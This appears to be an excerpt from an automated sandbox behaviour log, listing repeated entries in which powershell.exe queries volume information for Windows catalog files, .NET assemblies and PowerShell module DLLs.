Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
